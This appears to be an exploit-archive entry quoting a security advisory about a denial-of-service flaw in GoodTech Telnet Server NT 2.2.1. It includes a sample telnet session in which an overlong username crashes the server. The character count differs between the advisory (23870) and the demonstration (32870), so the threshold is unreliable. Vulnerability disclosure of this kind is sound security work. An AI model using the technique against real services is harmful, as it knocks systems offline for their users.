GoodTech Telnet Server NT 2.2.1 - Denial of Service

source: https://www.securityfocus.com/bid/862/info


GoodTech Telnet Server NT 2.2.1 is vulnerable to a remote denial of service attack due to an unchecked buffer. If 23870 or more characters are entered at the username prompt, the software will crash.

GoodTech's Telnet Server 95/98 may also be vulnerable to this overflow. 

$ telnet victimhost

Trying victimhost...
Connected to victimhost.
Escape character is '^]'.

Welcome to GoodTech Telnet Server for Windows NT (V2.2) (Evaluation Copy)

(C) Copyright 1996-1999 GoodTech Systems, Inc.


Login username: (32870 characters)

...server crash